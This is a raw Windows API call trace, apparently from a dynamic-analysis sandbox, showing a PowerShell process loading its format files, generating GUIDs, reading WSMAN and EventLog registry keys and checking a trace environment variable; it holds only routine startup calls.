0x1 [0253.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0253.246] CoTaskMemAlloc (cb=0x5a) returned 0x1ba35300 [0253.246] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16ccdc, lpData=0x1ba35300, lpcbData=0x16ccd8*=0x56 | out: lpType=0x16ccdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16ccd8*=0x56) returned 0x0 [0253.246] CoTaskMemFree (pv=0x1ba35300) [0253.247] RegCloseKey (hKey=0x30c) returned 0x0 [0253.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0253.251] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x40aae7a7, Data2=0x565a, Data3=0x47a6, Data4=([0]=0x97, [1]=0x6f, [2]=0x1b, [3]=0x80, [4]=0x23, [5]=0x24, [6]=0x2c, [7]=0x61))) returned 0x0 [0253.253] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xf50dee8f, Data2=0x5628, Data3=0x4018, Data4=([0]=0x83, [1]=0xea, [2]=0x36, [3]=0xa8, [4]=0x1d, [5]=0x92, [6]=0xa9, [7]=0x9a))) returned 0x0 [0253.255] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x4fb315d0, Data2=0xab08, Data3=0x4953, Data4=([0]=0xa5, [1]=0x2a, [2]=0x15, [3]=0xf1, [4]=0xc9, [5]=0xda, [6]=0xc9, [7]=0xda))) returned 0x0 [0253.256] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x8d378a16, Data2=0xe5a7, Data3=0x4f41, Data4=([0]=0xb5, [1]=0x8b, [2]=0x25, [3]=0x95, [4]=0x0, [5]=0x84, [6]=0xd, [7]=0xfa))) returned 0x0 [0253.257] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x53f25c4c, Data2=0xf0c1, Data3=0x466d, Data4=([0]=0xbb, [1]=0xba, [2]=0x9d, [3]=0x25, [4]=0x54, [5]=0x66, [6]=0xf3, [7]=0xb0))) returned 0x0 [0253.258] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x6535b92a, Data2=0x708c, Data3=0x4708, Data4=([0]=0xa8, [1]=0x83, [2]=0x22, [3]=0xc5, [4]=0x56, [5]=0xe5, [6]=0x3b, [7]=0xf6))) returned 0x0 [0253.258] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x354f0653, Data2=0x1774, Data3=0x4805, Data4=([0]=0xb7, [1]=0x81, [2]=0x3d, [3]=0x7c, [4]=0x91, [5]=0x8d, [6]=0x94, [7]=0xe8))) returned 0x0 [0253.259] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x91727dfd, Data2=0x364b, Data3=0x45e3, Data4=([0]=0xb6, [1]=0x81, [2]=0x6b, [3]=0x44, [4]=0xfe, [5]=0xc, [6]=0x4c, [7]=0x33))) returned 0x0 [0253.260] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x156c9405, Data2=0x14c1, Data3=0x47df, Data4=([0]=0xb5, [1]=0x69, [2]=0xe5, [3]=0x1d, [4]=0x2a, [5]=0x50, [6]=0xd8, [7]=0x3a))) returned 0x0 [0253.261] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x560a6fe2, Data2=0x47ed, Data3=0x4956, Data4=([0]=0xa6, [1]=0xc1, [2]=0xf5, [3]=0xb2, [4]=0x24, [5]=0x82, [6]=0x7d, [7]=0x75))) returned 0x0 [0253.261] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xff8fceca, Data2=0xf592, Data3=0x48c3, Data4=([0]=0xae, [1]=0x59, [2]=0x68, [3]=0x3d, [4]=0xdb, [5]=0xf3, [6]=0xd, [7]=0xd0))) returned 0x0 [0253.262] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x27c00f05, Data2=0x1234, Data3=0x4158, Data4=([0]=0x8a, [1]=0xf5, [2]=0x90, [3]=0xaf, [4]=0x50, [5]=0x26, [6]=0xf0, [7]=0x8c))) returned 0x0 [0253.263] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xd3ea8ad0, Data2=0x5ff, Data3=0x4022, Data4=([0]=0xa6, [1]=0xae, [2]=0x25, [3]=0x46, [4]=0x9d, [5]=0x40, [6]=0x51, [7]=0x6e))) returned 0x0 [0253.264] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xdb8ceb04, Data2=0x4d58, Data3=0x4440, Data4=([0]=0x9a, [1]=0x67, [2]=0xb2, [3]=0xb4, [4]=0x99, [5]=0x3b, [6]=0x4c, [7]=0xb6))) returned 0x0 [0253.264] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x434b1af3, Data2=0xb885, Data3=0x4441, Data4=([0]=0xaf, [1]=0xe2, [2]=0x22, [3]=0x2, [4]=0x48, [5]=0x3b, [6]=0x37, [7]=0x9d))) returned 0x0 [0253.265] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x19829a09, Data2=0x5aa4, Data3=0x437c, Data4=([0]=0xaa, [1]=0xb3, [2]=0xad, [3]=0x8a, [4]=0xdf, [5]=0x20, [6]=0x74, [7]=0xa0))) returned 0x0 [0253.266] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xfe28fc1, Data2=0xf843, Data3=0x4827, Data4=([0]=0xb3, [1]=0xe3, [2]=0xc7, [3]=0x5, [4]=0x45, [5]=0x4b, [6]=0x61, [7]=0xba))) returned 0x0 [0253.266] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x5ee729f8, Data2=0xc6a4, Data3=0x47d8, Data4=([0]=0xa4, [1]=0x40, [2]=0x11, [3]=0xe1, [4]=0x57, [5]=0x7a, [6]=0x71, [7]=0x33))) returned 0x0 [0253.267] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x7106bb22, Data2=0xb017, Data3=0x45e7, Data4=([0]=0x84, [1]=0x30, [2]=0x54, [3]=0x99, [4]=0x74, [5]=0xc2, [6]=0xf3, [7]=0x7a))) returned 0x0 [0253.268] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x1716315f, Data2=0xe035, Data3=0x4b5c, Data4=([0]=0xa0, [1]=0x4c, [2]=0xff, [3]=0x1e, [4]=0xe2, [5]=0x70, [6]=0xdc, [7]=0x8f))) returned 0x0 [0253.269] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xa007ef5d, Data2=0x964b, Data3=0x493a, Data4=([0]=0xaf, [1]=0xd3, [2]=0xf6, [3]=0xca, [4]=0x34, [5]=0xfc, [6]=0x8c, [7]=0xaf))) returned 0x0 [0253.270] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xb09944f2, Data2=0xc80a, Data3=0x42d6, Data4=([0]=0x97, [1]=0xc6, [2]=0xfc, [3]=0xe2, [4]=0x9f, [5]=0xdf, [6]=0xbf, [7]=0x91))) returned 0x0 [0253.270] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x7fb2a17, Data2=0x896c, Data3=0x49fd, Data4=([0]=0x84, [1]=0xab, [2]=0xf6, [3]=0xd8, [4]=0x29, [5]=0x2, [6]=0xc6, [7]=0x19))) returned 0x0 [0253.271] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xe78efb2f, Data2=0x6d18, Data3=0x412e, Data4=([0]=0x86, [1]=0x7, [2]=0xd6, [3]=0xa, [4]=0xfe, [5]=0x8a, [6]=0xf8, [7]=0xe0))) returned 0x0 [0253.272] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x20947bde, Data2=0xb5a6, Data3=0x44d2, Data4=([0]=0x83, [1]=0x6, [2]=0x1a, [3]=0x10, [4]=0x0, [5]=0x5f, [6]=0xa7, [7]=0xea))) returned 0x0 [0253.273] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x7ceecb50, Data2=0x9dcf, Data3=0x421e, Data4=([0]=0x9c, [1]=0x98, [2]=0x22, [3]=0x6, [4]=0xbe, [5]=0x16, [6]=0x59, [7]=0x22))) returned 0x0 [0253.273] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xf1c85616, Data2=0xba81, Data3=0x47b3, Data4=([0]=0x99, [1]=0x1, [2]=0x11, [3]=0x5a, [4]=0x49, [5]=0xcc, [6]=0x50, [7]=0x78))) returned 0x0 [0253.274] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x988b3137, Data2=0x2e6, Data3=0x44b0, Data4=([0]=0x8d, [1]=0xc7, [2]=0x8b, [3]=0xcc, [4]=0x46, [5]=0x59, [6]=0xdc, [7]=0x26))) returned 0x0 [0253.275] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x1550a658, Data2=0x255b, Data3=0x4371, Data4=([0]=0x9b, [1]=0xf5, [2]=0x55, [3]=0x17, [4]=0xa2, [5]=0x48, [6]=0x98, [7]=0x71))) returned 0x0 [0253.275] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x64e92e44, Data2=0x49d9, Data3=0x418b, Data4=([0]=0x85, [1]=0xb9, [2]=0x86, [3]=0x31, [4]=0xc5, [5]=0xa1, [6]=0xb9, [7]=0x5f))) returned 0x0 [0253.276] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xffcaec74, Data2=0x4fa9, Data3=0x4cf3, Data4=([0]=0xa8, [1]=0xa8, [2]=0x46, [3]=0xd4, [4]=0x9c, [5]=0x2a, [6]=0xb9, [7]=0xc3))) returned 0x0 [0253.277] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x3865cbfe, Data2=0xa2b6, Data3=0x406d, Data4=([0]=0x8b, [1]=0xe0, [2]=0x29, [3]=0x1a, [4]=0x25, [5]=0x5d, [6]=0xf0, [7]=0xbf))) returned 0x0 [0253.279] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xd45a50db, Data2=0x17a4, Data3=0x4e37, Data4=([0]=0xbb, [1]=0x4c, [2]=0xcc, [3]=0x55, [4]=0x52, [5]=0xe7, [6]=0xb, [7]=0xc4))) returned 0x0 [0253.284] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xabf90e1e, Data2=0x768d, Data3=0x4834, Data4=([0]=0xb5, [1]=0xb6, [2]=0x61, [3]=0xb1, [4]=0x43, [5]=0x34, [6]=0xa9, [7]=0x68))) returned 0x0 [0253.285] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xda3abeae, Data2=0x24e2, Data3=0x43b2, Data4=([0]=0x81, [1]=0x2b, [2]=0x78, [3]=0xa8, [4]=0xcb, [5]=0xa, [6]=0x60, [7]=0xe6))) returned 0x0 [0253.287] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x8b6565dd, Data2=0x55e3, Data3=0x4312, Data4=([0]=0xba, [1]=0xba, [2]=0xf8, [3]=0xe7, [4]=0xa9, [5]=0x5, [6]=0x25, [7]=0x8))) returned 0x0 [0253.288] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x3a78df1a, Data2=0xede0, Data3=0x4e40, Data4=([0]=0xab, [1]=0x49, [2]=0x6f, [3]=0x3a, [4]=0x53, [5]=0x47, [6]=0x87, [7]=0xb))) returned 0x0 [0253.289] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xf942f87d, Data2=0xca8a, Data3=0x4240, Data4=([0]=0xb5, [1]=0x4, [2]=0x6a, [3]=0x5c, [4]=0xbf, [5]=0x22, [6]=0x17, [7]=0x10))) returned 0x0 [0253.289] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xc0301a77, Data2=0xa74c, Data3=0x4b31, Data4=([0]=0xa7, [1]=0x4f, [2]=0x5f, [3]=0x99, [4]=0xfc, [5]=0x4b, [6]=0xd4, [7]=0x3a))) returned 0x0 [0253.290] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x7a171272, Data2=0x26ff, Data3=0x481f, Data4=([0]=0xb3, [1]=0xa3, [2]=0x60, [3]=0xe2, [4]=0xc2, [5]=0x2, [6]=0x35, [7]=0x40))) returned 0x0 [0253.291] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x65a78db0, Data2=0x4945, Data3=0x4605, Data4=([0]=0x81, [1]=0xbb, [2]=0x41, [3]=0xa1, [4]=0xdd, [5]=0x41, [6]=0x2b, [7]=0xa6))) returned 0x0 [0253.292] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xa1f0b10a, Data2=0x720, Data3=0x4514, Data4=([0]=0xac, [1]=0x1f, [2]=0x78, [3]=0x8c, [4]=0xcf, [5]=0xe5, [6]=0x99, [7]=0xa7))) returned 0x0 [0253.293] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x27320802, Data2=0x8963, Data3=0x49f7, Data4=([0]=0xaa, [1]=0xf4, [2]=0xe2, [3]=0xda, [4]=0xcd, [5]=0x80, [6]=0x6, [7]=0xb2))) returned 0x0 [0253.294] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x2b9a25c7, Data2=0x6180, Data3=0x4138, Data4=([0]=0x92, [1]=0x6, [2]=0x8f, [3]=0xe1, [4]=0xdc, [5]=0xec, [6]=0xb6, [7]=0x29))) returned 0x0 [0253.294] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xf92be647, Data2=0x1750, Data3=0x4747, Data4=([0]=0x95, [1]=0x4b, [2]=0x86, [3]=0x83, [4]=0x56, [5]=0x2e, [6]=0xc4, [7]=0xc5))) returned 0x0 [0253.295] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x2a6753c8, Data2=0x7d31, Data3=0x4fa4, Data4=([0]=0x8e, [1]=0x9b, [2]=0x92, [3]=0xb2, [4]=0x1a, [5]=0x36, [6]=0x20, [7]=0xc2))) returned 0x0 [0253.296] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xb2f82128, Data2=0x1d59, Data3=0x4f9c, Data4=([0]=0x89, [1]=0x27, [2]=0x8f, [3]=0x9f, [4]=0x10, [5]=0x9f, [6]=0x7d, [7]=0xce))) returned 0x0 [0253.297] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x580390f7, Data2=0xefc4, Data3=0x4cac, Data4=([0]=0x83, [1]=0x2e, [2]=0x2d, [3]=0xf3, [4]=0x7f, [5]=0x13, [6]=0xd8, [7]=0x43))) returned 0x0 [0253.302] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16cca0 | out: lpFileInformation=0x16cca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0253.302] SetErrorMode (uMode=0x1) returned 0x1 [0253.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0253.303] CoTaskMemAlloc (cb=0x5a) returned 0x1ba35300 [0253.304] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16ccdc, lpData=0x1ba35300, lpcbData=0x16ccd8*=0x56 | out: lpType=0x16ccdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16ccd8*=0x56) returned 0x0 [0253.304] CoTaskMemFree (pv=0x1ba35300) [0253.304] RegCloseKey (hKey=0x30c) returned 0x0 [0253.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0253.305] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xfebf3673, Data2=0xc256, Data3=0x4142, Data4=([0]=0xb1, [1]=0x54, [2]=0xeb, [3]=0x2e, [4]=0x4f, [5]=0xcc, [6]=0x6c, [7]=0xd0))) returned 0x0 [0253.306] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x97e88a2, Data2=0x32c3, Data3=0x4afc, Data4=([0]=0xa8, [1]=0x30, [2]=0x50, [3]=0x22, [4]=0x1d, [5]=0x46, [6]=0x3c, [7]=0xa4))) returned 0x0 [0253.311] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16cca0 | out: lpFileInformation=0x16cca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0253.311] SetErrorMode (uMode=0x1) returned 0x1 [0253.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0253.312] CoTaskMemAlloc (cb=0x5a) returned 0x1ba35300 [0253.313] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16ccdc, lpData=0x1ba35300, lpcbData=0x16ccd8*=0x56 | out: lpType=0x16ccdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16ccd8*=0x56) returned 0x0 [0253.313] CoTaskMemFree (pv=0x1ba35300) [0253.313] RegCloseKey (hKey=0x30c) returned 0x0 [0253.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0253.315] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xc1407ee4, Data2=0x92d8, Data3=0x4780, Data4=([0]=0xb9, [1]=0xf6, [2]=0xd, [3]=0xd0, [4]=0x49, [5]=0xdf, [6]=0xa9, [7]=0x67))) returned 0x0 [0253.316] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x213d9b6e, Data2=0xac89, Data3=0x464f, Data4=([0]=0x86, [1]=0x2, [2]=0xf3, [3]=0xc4, [4]=0x8a, [5]=0xca, [6]=0x26, [7]=0xce))) returned 0x0 [0253.564] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0253.564] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0253.564] CoTaskMemFree (pv=0x343980) [0253.566] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0253.566] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0253.566] CoTaskMemFree (pv=0x343980) [0253.568] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0253.568] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0253.568] CoTaskMemFree (pv=0x343980) [0253.570] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0253.570] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0253.570] CoTaskMemFree (pv=0x343980) [0253.613] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0253.614] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0253.614] CoTaskMemFree (pv=0x343980) [0253.617] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0253.617] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0253.617] CoTaskMemFree (pv=0x343980) [0253.618] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0253.618] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0253.618] CoTaskMemFree (pv=0x343980) [0253.622] RegQueryInfoKeyW (in: hKey=0x30c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16ce9c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16ce98, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16ce9c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16ce98*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0253.623] CoTaskMemFree (pv=0x0) [0253.624] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0253.624] RegEnumValueW (in: hKey=0x30c, dwIndex=0x0, lpValueName=0x3220d0, lpcchValueName=0x16cf48, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x16cf48, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0253.624] CoTaskMemFree (pv=0x3220d0) [0253.624] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0253.624] RegEnumValueW (in: hKey=0x30c, dwIndex=0x1, lpValueName=0x3220d0, lpcchValueName=0x16cf48, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x16cf48, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0253.624] CoTaskMemFree (pv=0x3220d0) [0253.624] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0253.624] RegEnumValueW (in: hKey=0x30c, dwIndex=0x2, lpValueName=0x3220d0, lpcchValueName=0x16cf48, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x16cf48, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0253.624] CoTaskMemFree (pv=0x3220d0) [0253.626] CoTaskMemAlloc (cb=0xc) returned 0x1ba48340 [0253.626] RegQueryValueExW (in: hKey=0x30c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16cefc, lpData=0x1ba48340, lpcbData=0x16cef8*=0x8 | out: lpType=0x16cefc*=0x1, lpData="2.0", lpcbData=0x16cef8*=0x8) returned 0x0 [0253.626] CoTaskMemFree (pv=0x1ba48340) [0253.787] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cee8 | out: phkResult=0x16cee8*=0x310) returned 0x0 [0253.787] RegQueryInfoKeyW (in: hKey=0x310, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16cdec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16cde8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16cdec*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16cde8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0253.787] CoTaskMemFree (pv=0x0) [0253.787] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0253.787] RegEnumValueW (in: hKey=0x310, dwIndex=0x0, lpValueName=0x3220d0, lpcchValueName=0x16ce98, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x16ce98, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0253.787] CoTaskMemFree (pv=0x3220d0) [0253.787] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0253.788] RegEnumValueW (in: hKey=0x310, dwIndex=0x1, lpValueName=0x3220d0, lpcchValueName=0x16ce98, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x16ce98, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0253.788] CoTaskMemFree (pv=0x3220d0) [0253.788] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0253.788] RegEnumValueW (in: hKey=0x310, dwIndex=0x2, lpValueName=0x3220d0, lpcchValueName=0x16ce98, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x16ce98, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0253.788] CoTaskMemFree (pv=0x3220d0) [0253.788] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16ce7c, lpData=0x0, lpcbData=0x16ce78*=0x0 | out: lpType=0x16ce7c*=0x1, lpData=0x0, lpcbData=0x16ce78*=0x8) returned 0x0 [0253.788] CoTaskMemAlloc (cb=0xc) returned 0x1ba481a0 [0253.788] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16ce4c, lpData=0x1ba481a0, lpcbData=0x16ce48*=0x8 | out: lpType=0x16ce4c*=0x1, lpData="2.0", lpcbData=0x16ce48*=0x8) returned 0x0 [0253.788] CoTaskMemFree (pv=0x1ba481a0) [0253.790] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0253.790] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0253.790] CoTaskMemFree (pv=0x343980) [0253.831] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0253.831] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0253.831] CoTaskMemFree (pv=0x343980) [0253.857] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf18 | out: phkResult=0x16cf18*=0x324) returned 0x0 [0253.863] CoTaskMemFree (pv=0x0) [0253.864] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 